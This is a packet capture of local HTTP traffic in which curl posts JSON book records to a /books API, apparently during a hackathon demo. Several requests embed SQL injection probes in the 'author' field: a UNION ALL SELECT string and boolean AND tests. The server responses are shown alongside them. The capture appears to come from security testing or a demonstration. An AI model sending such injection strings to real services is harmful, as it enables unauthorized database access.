20:40:59.521068 IP6 (hlim 64, next-header TCP (6) payload length: 249) ::1.53826 > ::1.8080: Flags [P.], cksum 0x0101 (incorrect -> 0x67de), seq 1:218, ack 1, win 342, options [nop,nop,TS val 3879785 ecr 3879785], length 217: HTTP, length: 217
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 82
	
	{"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":"9.99"}[!http]
20:40:59.521084 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53826: Flags [.], cksum 0x0028 (incorrect -> 0x4318), seq 1, ack 218, win 350, options [nop,nop,TS val 3879785 ecr 3879785], length 0
20:40:59.526338 IP6 (hlim 64, next-header TCP (6) payload length: 255) ::1.8080 > ::1.53826: Flags [P.], cksum 0x0107 (incorrect -> 0x6aad), seq 1:224, ack 218, win 350, options [nop,nop,TS val 3879790 ecr 3879785], length 223: HTTP, length: 223
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	
	59
	{"id":256,"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":9.99}
20:40:59.526359 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53826 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x422f), seq 218, ack 224, win 350, options [nop,nop,TS val 3879790 ecr 3879790], length 0
20:40:59.526718 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53826: Flags [P.], cksum 0x002d (incorrect -> 0xfe07), seq 224:229, ack 218, win 350, options [nop,nop,TS val 3879790 ecr 3879790], length 5: HTTP
20:40:59.526741 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53826 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x422a), seq 218, ack 229, win 350, options [nop,nop,TS val 3879790 ecr 3879790], length 0
20:40:59.527064 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53826 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x4228), seq 218, ack 229, win 350, options [nop,nop,TS val 3879791 ecr 3879790], length 0
20:40:59.528140 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53826: Flags [F.], cksum 0x0028 (incorrect -> 0x4225), seq 229, ack 219, win 350, options [nop,nop,TS val 3879792 ecr 3879791], length 0
20:40:59.528160 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53826 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4224), seq 219, ack 230, win 350, options [nop,nop,TS val 3879792 ecr 3879792], length 0
20:40:59.539351 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53828 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xff10), seq 4124084438, win 43690, options [mss 65476,sackOK,TS val 3879803 ecr 0,nop,wscale 7], length 0
20:40:59.539378 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53828: Flags [S.], cksum 0x0030 (incorrect -> 0x374b), seq 1873093721, ack 4124084439, win 43690, options [mss 65476,sackOK,TS val 3879803 ecr 3879803,nop,wscale 7], length 0
20:40:59.539397 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53828 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x097d), seq 1, ack 1, win 342, options [nop,nop,TS val 3879803 ecr 3879803], length 0
20:40:59.539484 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.53828 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x052a), seq 1:197, ack 1, win 342, options [nop,nop,TS val 3879803 ecr 3879803], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo9","author":"Ramesh-P","price":"9.99"}[!http]
20:40:59.539499 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53828: Flags [.], cksum 0x0028 (incorrect -> 0x08b1), seq 1, ack 197, win 350, options [nop,nop,TS val 3879803 ecr 3879803], length 0
20:40:59.542264 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.53828: Flags [P.], cksum 0x00f2 (incorrect -> 0x1a00), seq 1:203, ack 197, win 350, options [nop,nop,TS val 3879806 ecr 3879803], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	
	44
	{"id":257,"name":"Hackathon-Demo9","author":"Ramesh-P","price":9.99}
20:40:59.542281 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53828 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x07e1), seq 197, ack 203, win 350, options [nop,nop,TS val 3879806 ecr 3879806], length 0
20:40:59.542555 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53828: Flags [P.], cksum 0x002d (incorrect -> 0xc3b9), seq 203:208, ack 197, win 350, options [nop,nop,TS val 3879806 ecr 3879806], length 5: HTTP
20:40:59.542570 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53828 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x07dc), seq 197, ack 208, win 350, options [nop,nop,TS val 3879806 ecr 3879806], length 0
20:40:59.542745 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53828 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x07db), seq 197, ack 208, win 350, options [nop,nop,TS val 3879806 ecr 3879806], length 0
20:40:59.542987 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53828: Flags [F.], cksum 0x0028 (incorrect -> 0x07d9), seq 208, ack 198, win 350, options [nop,nop,TS val 3879807 ecr 3879806], length 0
20:40:59.543028 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53828 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x07d8), seq 198, ack 209, win 350, options [nop,nop,TS val 3879807 ecr 3879807], length 0
20:40:59.552538 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53830 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x8fe1), seq 1280942446, win 43690, options [mss 65476,sackOK,TS val 3879816 ecr 0,nop,wscale 7], length 0
20:40:59.552555 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53830: Flags [S.], cksum 0x0030 (incorrect -> 0x509f), seq 1028509216, ack 1280942447, win 43690, options [mss 65476,sackOK,TS val 3879816 ecr 3879816,nop,wscale 7], length 0
20:40:59.552568 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53830 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x22d1), seq 1, ack 1, win 342, options [nop,nop,TS val 3879816 ecr 3879816], length 0
20:40:59.552631 IP6 (hlim 64, next-header TCP (6) payload length: 260) ::1.53830 > ::1.8080: Flags [P.], cksum 0x010c (incorrect -> 0x6433), seq 1:229, ack 1, win 342, options [nop,nop,TS val 3879816 ecr 3879816], length 228: HTTP, length: 228
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 93
	
	{"name":"Hackathon-Demo10","author":"Ramesh %"))) AND 1868=7345 AND ((("%"="","price":"9.99"}[!http]
20:40:59.552640 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53830: Flags [.], cksum 0x0028 (incorrect -> 0x21e5), seq 1, ack 229, win 350, options [nop,nop,TS val 3879816 ecr 3879816], length 0
20:40:59.554985 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.53830: Flags [P.], cksum 0x0084 (incorrect -> 0xca3b), seq 1:93, ack 229, win 350, options [nop,nop,TS val 3879819 ecr 3879816], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	Connection: close
	
20:40:59.555012 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53830 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x218b), seq 229, ack 93, win 342, options [nop,nop,TS val 3879819 ecr 3879819], length 0
20:40:59.555116 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53830: Flags [F.], cksum 0x0028 (incorrect -> 0x2182), seq 93, ack 229, win 350, options [nop,nop,TS val 3879819 ecr 3879819], length 0
20:40:59.555282 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53830 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x2189), seq 229, ack 94, win 342, options [nop,nop,TS val 3879819 ecr 3879819], length 0
20:40:59.555302 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53830: Flags [.], cksum 0x0028 (incorrect -> 0x2181), seq 94, ack 230, win 350, options [nop,nop,TS val 3879819 ecr 3879819], length 0
20:40:59.565359 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53832 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x92eb), seq 1949464188, win 43690, options [mss 65476,sackOK,TS val 3879829 ecr 0,nop,wscale 7], length 0
20:40:59.565384 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53832: Flags [S.], cksum 0x0030 (incorrect -> 0xdba5), seq 709581081, ack 1949464189, win 43690, options [mss 65476,sackOK,TS val 3879829 ecr 3879829,nop,wscale 7], length 0
20:40:59.565402 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53832 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xadd7), seq 1, ack 1, win 342, options [nop,nop,TS val 3879829 ecr 3879829], length 0
20:40:59.565485 IP6 (hlim 64, next-header TCP (6) payload length: 229) ::1.53832 > ::1.8080: Flags [P.], cksum 0x00ed (incorrect -> 0xad55), seq 1:198, ack 1, win 342, options [nop,nop,TS val 3879829 ecr 3879829], length 197: HTTP, length: 197
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 62
	
	{"name":"Hackathon-Demo11","author":"Ramesh-P","price":"9.99"}[!http]
20:40:59.565498 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53832: Flags [.], cksum 0x0028 (incorrect -> 0xad0a), seq 1, ack 198, win 350, options [nop,nop,TS val 3879829 ecr 3879829], length 0
20:40:59.568875 IP6 (hlim 64, next-header TCP (6) payload length: 235) ::1.8080 > ::1.53832: Flags [P.], cksum 0x00f3 (incorrect -> 0xaf3b), seq 1:204, ack 198, win 350, options [nop,nop,TS val 3879833 ecr 3879829], length 203: HTTP, length: 203
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	
	45
	{"id":258,"name":"Hackathon-Demo11","author":"Ramesh-P","price":9.99}
20:40:59.568890 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53832 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xac37), seq 198, ack 204, win 350, options [nop,nop,TS val 3879833 ecr 3879833], length 0
20:40:59.569165 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53832: Flags [P.], cksum 0x002d (incorrect -> 0x6810), seq 204:209, ack 198, win 350, options [nop,nop,TS val 3879833 ecr 3879833], length 5: HTTP
20:40:59.569180 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53832 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xac32), seq 198, ack 209, win 350, options [nop,nop,TS val 3879833 ecr 3879833], length 0
20:40:59.576131 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53832 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xac2a), seq 198, ack 209, win 350, options [nop,nop,TS val 3879840 ecr 3879833], length 0
20:40:59.577165 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53832: Flags [F.], cksum 0x0028 (incorrect -> 0xac21), seq 209, ack 199, win 350, options [nop,nop,TS val 3879841 ecr 3879840], length 0
20:40:59.577187 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53832 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xac20), seq 199, ack 210, win 350, options [nop,nop,TS val 3879841 ecr 3879841], length 0
20:40:59.587958 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53834 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x55bd), seq 683540230, win 43690, options [mss 65476,sackOK,TS val 3879852 ecr 0,nop,wscale 7], length 0
20:40:59.587988 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53834: Flags [S.], cksum 0x0030 (incorrect -> 0x4dc8), seq 901881403, ack 683540231, win 43690, options [mss 65476,sackOK,TS val 3879852 ecr 3879852,nop,wscale 7], length 0
20:40:59.588008 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53834 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x1ffa), seq 1, ack 1, win 342, options [nop,nop,TS val 3879852 ecr 3879852], length 0
20:40:59.588102 IP6 (hlim 64, next-header TCP (6) payload length: 259) ::1.53834 > ::1.8080: Flags [P.], cksum 0x010b (incorrect -> 0x08dd), seq 1:228, ack 1, win 342, options [nop,nop,TS val 3879852 ecr 3879852], length 227: HTTP, length: 227
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 92
	
	{"name":"Hackathon-Demo12","author":"Ramesh%"))) AND 3428=3428 AND ((("%"="","price":"9.99"}[!http]
20:40:59.588116 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53834: Flags [.], cksum 0x0028 (incorrect -> 0x1f0f), seq 1, ack 228, win 350, options [nop,nop,TS val 3879852 ecr 3879852], length 0
20:40:59.590905 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.53834: Flags [P.], cksum 0x0084 (incorrect -> 0xc765), seq 1:93, ack 228, win 350, options [nop,nop,TS val 3879855 ecr 3879852], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	Connection: close
	
